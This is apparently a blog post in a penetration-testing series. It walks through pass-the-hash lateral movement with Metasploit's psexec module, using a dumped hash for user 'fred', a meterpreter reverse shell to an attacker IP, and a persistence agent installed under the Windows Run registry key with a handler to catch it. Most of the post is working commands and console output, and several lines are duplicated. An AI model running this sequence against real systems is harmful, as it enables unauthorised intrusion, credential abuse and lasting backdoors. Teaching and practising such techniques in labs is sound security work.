Background
When last we left, we had just launched a meterpreter session on our internal client and did some looking around for other systems.
Process
So now that we have identified some systems, let's exploit one.
10.13.37.130 looks interesting. Judging by the ports, it's probably a windows system. I wonder if Fred has an account on it. Let's see by using the Metasploit exploit psexec.
use exploit/windows/smb/psexec
msf exploit(psexec) > set SMBUSER fredSMBUSER => fred
msf exploit(psexec) > set SMBPASS 921988ba001dc8e14a3b108f3cb6d:e19c5ee54e06b06a5907af13cef42
msf exploit(psexec) > set LPORT 80
msf exploit(psexec) > set LHOST 192.168.1.155
msf exploit(psexec) > set RHOST 10.13.37.130
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPASS 921988ba001dc8e14a3b108f3cb6d:e19c5ee54e06b06a5907af13cef42
msf exploit(psexec) > set LPORT 80
msf exploit(psexec) > set LHOST 192.168.1.155
msf exploit(psexec) > set RHOST 10.13.37.130
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
Explanation
psexec is a powerful weapon against Windows machines. The exploit is based on the psexec tool by Mark Russinovich, just one of the amazing Windows tools from the Sysinternals section of microsoft.com, but Metasploit adds to it the extra bonus of being able to use the LM/NT hash instead of the password. For more information on how the pass the hash technique works, see http://oss.coresecurity.com/projects/pshtoolkit.htm.
In the previous episode, we dumped the hash from the first system using the hasdump tool. We will use it now. msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.155:80
[*] Connecting to the server...
[*] Authenticating as user 'fred'...
[*] Starting the service...
..
..
[*] Meterpreter session 2 opened (192.168.1.155:80 -> 192.168.1.156:56723)
Success. Looks like Fred does have an account.
meterpreter > ipconfig
Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC: 00:0c:29:6f:46:81
IP Address : 10.2.2.129
Netmask : 255.255.255.0
Hardware MAC: 00:0c:29:6f:46:81
IP Address : 10.2.2.129
Netmask : 255.255.255.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:6f:46:77
IP Address : 10.13.37.55
Netmask : 255.255.255.0
Hardware MAC: 00:0c:29:6f:46:77
IP Address : 10.13.37.55
Netmask : 255.255.255.0
Excellent! This server has two network cards. We could just start exploring this new network, but let's start using this machine as our pivot device.
There are several ways to use meterpreter as a backdoor.
We could use the payload metsvc, but this payload is a bind shell exploit. In other words our machine connects to a port on the target machine (which port it uses can be changed in the metsvc.rb file in the rport section). This won't work in our scenario because of the firewall.
We could also use msfpayload and generate an executable and use meterpreter to upload the new executable to the server. There are excellent examples of using msfpayload on synjukie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html.
But...there is an even easier option since we already have a meterpreter session- persistence.
run persistence-U -i 5 -p 443 -r 192.168.1.155
Explanation
-U start the agent when the user logs on
-i check back every 5 seconds
-p and -r are our port and ip
-U start the agent when the user logs on
-i check back every 5 seconds
-p and -r are our port and ip
[*] Creating a persistent agent: LHOST=192.168.1.155 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 611056 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\rRFCGIkV.vbs
[*] Agent executed with PID 312
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\RomCdWAl
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\RomCdWAl
[*] For cleanup use command: run multi_console_command -rc /.........../clean_up__20100917.5158.rc
So now we lets exit all our meterpreter sessions
meterpreter > exit
[*] Meterpreter session 2 closed. Reason: User exit
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
remove the route since we won't be needing this one anymore
meterpreter > exit
now setup our new payload handler
msf exploit(psexec) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.155
LHOST => 192.168.1.155
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
and as quick as you can say "Bob's your uncle"
[*] Started reverse handler on 192.168.1.155:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.156
[*] Meterpreter session 3 opened (192.168.1.155:443 -> 192.168.1.156:61943
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.156
[*] Meterpreter session 3 opened (192.168.1.155:443 -> 192.168.1.156:61943
our persistence payload connected back to us.
Next Steps
Exploring the next hop in the network, using portfwd to rdp.
No comments:
Post a Comment